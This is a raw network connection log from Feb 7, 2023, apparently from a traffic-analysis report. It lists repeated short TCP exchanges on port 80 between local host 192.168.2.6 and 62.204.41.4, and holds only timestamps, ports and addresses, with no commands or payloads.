Feb 7, 2023 20:01:56.925246954 CET	49956	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.926232100 CET	49957	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.988034010 CET	80	49956	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.988117933 CET	49956	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.988764048 CET	80	49957	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.988895893 CET	49957	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.989415884 CET	49957	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.051857948 CET	80	49957	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.056065083 CET	80	49957	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.056219101 CET	49957	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.172566891 CET	49957	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.173638105 CET	49958	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.236646891 CET	80	49958	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.236692905 CET	80	49957	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.236833096 CET	49957	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.236854076 CET	49958	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.237616062 CET	49958	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.304018021 CET	80	49958	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.307380915 CET	80	49958	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.307703972 CET	49958	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.426920891 CET	49958	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.427927017 CET	49959	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.488353968 CET	80	49958	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.488394022 CET	80	49959	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.488522053 CET	49958	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.488565922 CET	49959	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.490225077 CET	49959	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.550677061 CET	80	49959	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.553457022 CET	80	49959	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.553529978 CET	49959	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.659888983 CET	49959	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.662360907 CET	49960	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.720652103 CET	80	49959	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.720798016 CET	49959	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.721813917 CET	80	49960	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.721951008 CET	49960	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.722505093 CET	49960	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.783432007 CET	80	49960	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.785676003 CET	80	49960	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.785820007 CET	49960	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.892131090 CET	49960	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.893170118 CET	49961	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.951711893 CET	80	49960	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.951807022 CET	49960	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.954997063 CET	80	49961	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:57.955290079 CET	49961	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:57.956540108 CET	49961	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.018328905 CET	80	49961	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.020838022 CET	80	49961	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.021034002 CET	49961	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.145361900 CET	49961	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.146359921 CET	49962	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.207020044 CET	80	49961	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.207679033 CET	49961	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.208908081 CET	80	49962	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.212119102 CET	49962	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.212789059 CET	49962	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.276725054 CET	80	49962	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.280103922 CET	80	49962	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.280236959 CET	49962	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.390671015 CET	49962	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.391787052 CET	49963	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.453303099 CET	80	49962	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.453336954 CET	80	49963	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.453527927 CET	49962	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.453617096 CET	49963	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.504584074 CET	49963	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.566394091 CET	80	49963	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.568939924 CET	80	49963	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.569148064 CET	49963	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.696500063 CET	49963	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.697527885 CET	49964	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.758341074 CET	80	49963	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.758729935 CET	80	49964	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.758945942 CET	49963	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.759027004 CET	49964	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.773796082 CET	49964	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.835231066 CET	80	49964	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.838499069 CET	80	49964	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:58.838751078 CET	49964	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.953633070 CET	49964	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:58.955063105 CET	49965	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.015019894 CET	80	49964	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.015208960 CET	49964	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.015396118 CET	80	49965	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.015542030 CET	49965	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.016139984 CET	49965	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.076451063 CET	80	49965	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.083553076 CET	80	49965	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.083637953 CET	49965	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.188110113 CET	49965	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.189321041 CET	49966	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.248569965 CET	80	49965	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.248666048 CET	49965	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.249706984 CET	80	49966	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.249829054 CET	49966	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.250310898 CET	49966	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.312314987 CET	80	49966	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.315323114 CET	80	49966	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.315466881 CET	49966	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.422607899 CET	49966	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.423784018 CET	49967	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.484474897 CET	80	49966	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.484617949 CET	49966	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.486471891 CET	80	49967	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.486649990 CET	49967	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.487215042 CET	49967	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.551584959 CET	80	49967	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.554467916 CET	80	49967	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.554641008 CET	49967	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.672955990 CET	49967	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.673870087 CET	49968	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.734532118 CET	80	49968	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.734574080 CET	80	49967	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.734826088 CET	49967	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.735491991 CET	49968	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.735491991 CET	49968	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.796308994 CET	80	49968	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.799014091 CET	80	49968	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.799073935 CET	49968	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.906352997 CET	49968	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.908540964 CET	49969	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.967128992 CET	80	49968	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.967395067 CET	49968	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.968873024 CET	80	49969	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:59.969049931 CET	49969	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:59.969580889 CET	49969	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.029802084 CET	80	49969	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.032289982 CET	80	49969	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.032475948 CET	49969	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.144305944 CET	49969	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.145375967 CET	49970	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.204688072 CET	80	49969	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.204880953 CET	49969	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.205806971 CET	80	49970	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.205976009 CET	49970	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.209992886 CET	49970	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.270606041 CET	80	49970	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.275804043 CET	80	49970	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.275935888 CET	49970	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.396598101 CET	49970	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.397881985 CET	49971	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.457197905 CET	80	49971	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.457308054 CET	80	49970	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.457397938 CET	49971	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.457443953 CET	49970	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.459434032 CET	49971	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.518680096 CET	80	49971	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.521142960 CET	80	49971	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.521307945 CET	49971	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.642389059 CET	49971	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.643554926 CET	49973	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.701919079 CET	80	49971	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.702042103 CET	49971	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.703813076 CET	80	49973	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.703927040 CET	49973	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.704663992 CET	49973	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.766530037 CET	80	49973	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.768744946 CET	80	49973	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.768862009 CET	49973	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.880254984 CET	49973	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.881190062 CET	49974	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.941603899 CET	80	49973	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.941832066 CET	49973	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.944438934 CET	80	49974	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:00.944621086 CET	49974	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:00.945241928 CET	49974	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.007723093 CET	80	49974	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.010104895 CET	80	49974	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.010253906 CET	49974	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.126602888 CET	49974	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.127619982 CET	49975	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.188180923 CET	80	49975	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.189074039 CET	80	49974	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.189238071 CET	49974	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.189245939 CET	49975	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.204511881 CET	49975	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.265125990 CET	80	49975	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.269857883 CET	80	49975	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.269974947 CET	49975	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.376391888 CET	49975	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.378160000 CET	49976	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.437252998 CET	80	49975	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.437455893 CET	49975	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.440541029 CET	80	49976	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.441303968 CET	49976	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.442059994 CET	49976	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.504507065 CET	80	49976	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.507285118 CET	80	49976	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.507447958 CET	49976	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.641171932 CET	49976	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.642198086 CET	49977	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.703576088 CET	80	49977	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.703608036 CET	80	49976	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.703826904 CET	49976	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.709410906 CET	49977	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.710756063 CET	49977	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.772690058 CET	80	49977	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.775300980 CET	80	49977	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.775417089 CET	49977	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.895601034 CET	49977	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.896821976 CET	49978	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.961057901 CET	80	49977	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.961528063 CET	49977	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.962186098 CET	80	49978	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:01.962338924 CET	49978	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:01.964464903 CET	49978	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.026784897 CET	80	49978	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.029624939 CET	80	49978	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.029800892 CET	49978	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.141002893 CET	49978	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.145124912 CET	49979	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.205465078 CET	80	49978	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.205693007 CET	49978	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.206500053 CET	80	49979	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.206850052 CET	49979	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.207617998 CET	49979	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.268624067 CET	80	49979	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.273052931 CET	80	49979	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.277627945 CET	49979	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.402184963 CET	49979	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.403506994 CET	49980	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.461359978 CET	80	49979	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.461622953 CET	49979	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.463747025 CET	80	49980	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.464071035 CET	49980	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.464632988 CET	49980	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.524935007 CET	80	49980	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.527991056 CET	80	49980	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.529639006 CET	49980	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.640799046 CET	49980	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.641726971 CET	49981	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.701258898 CET	80	49980	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.701541901 CET	49980	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.701900959 CET	80	49981	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.702045918 CET	49981	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.719021082 CET	49981	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.779495955 CET	80	49981	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.783189058 CET	80	49981	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.783495903 CET	49981	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.890815020 CET	49981	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.891844034 CET	49982	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.951215029 CET	80	49981	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.951316118 CET	49981	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.952229023 CET	80	49982	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:02.952507973 CET	49982	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:02.953057051 CET	49982	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.013508081 CET	80	49982	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.016334057 CET	80	49982	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.016511917 CET	49982	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.127022028 CET	49982	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.128309011 CET	49983	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.188684940 CET	80	49982	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.188879013 CET	49982	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.189397097 CET	80	49983	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.189564943 CET	49983	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.190207005 CET	49983	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.254201889 CET	80	49983	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.259171963 CET	80	49983	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.259371996 CET	49983	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.378369093 CET	49983	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.379096031 CET	49984	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.439584970 CET	80	49984	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.439615011 CET	80	49983	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.439768076 CET	49983	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.439784050 CET	49984	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.441087008 CET	49984	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.501652002 CET	80	49984	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.505045891 CET	80	49984	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.505194902 CET	49984	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.609083891 CET	49984	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.609915972 CET	49985	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.670523882 CET	80	49984	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.670757055 CET	49984	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.671158075 CET	80	49985	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.671288013 CET	49985	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.672174931 CET	49985	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.732675076 CET	80	49985	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.735590935 CET	80	49985	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.735780954 CET	49985	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.843825102 CET	49985	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.844921112 CET	49986	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.904448986 CET	80	49985	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.904678106 CET	49985	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.907713890 CET	80	49986	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.907975912 CET	49986	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.914623976 CET	49986	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:03.979494095 CET	80	49986	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.981905937 CET	80	49986	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:03.981982946 CET	49986	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.094052076 CET	49986	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.095129013 CET	49987	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.154846907 CET	80	49987	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:04.155025959 CET	49987	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.156256914 CET	80	49986	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:04.156363010 CET	49986	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.169863939 CET	49987	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.229386091 CET	80	49987	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:04.233376026 CET	80	49987	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:04.233457088 CET	49987	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.345220089 CET	49987	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.348925114 CET	49988	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.404921055 CET	80	49987	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:04.405054092 CET	49987	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.409257889 CET	80	49988	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:04.409612894 CET	49988	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.410732031 CET	49988	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.473036051 CET	80	49988	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:04.476504087 CET	80	49988	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:04.476613045 CET	49988	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.631584883 CET	49988	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:04.691997051 CET	80	49988	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:04.692143917 CET	49988	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.007635117 CET	49989	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.068902016 CET	80	49989	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.071870089 CET	49989	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.120373964 CET	49989	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.182590008 CET	80	49989	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.187333107 CET	80	49989	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.187417984 CET	49989	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.299154997 CET	49989	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.300163031 CET	49990	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.358903885 CET	80	49989	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.359905958 CET	49989	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.360503912 CET	80	49990	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.360663891 CET	49990	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.389457941 CET	49990	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.449801922 CET	80	49990	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.453105927 CET	80	49990	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.456588030 CET	49990	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.658864021 CET	49990	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.659878016 CET	49991	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.720299959 CET	80	49990	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.720633984 CET	49990	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.721410036 CET	80	49991	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.721525908 CET	49991	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.764040947 CET	49991	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:05.825238943 CET	80	49991	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.828155994 CET	80	49991	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:05.828948975 CET	49991	80	192.168.2.6	62.204.41.4
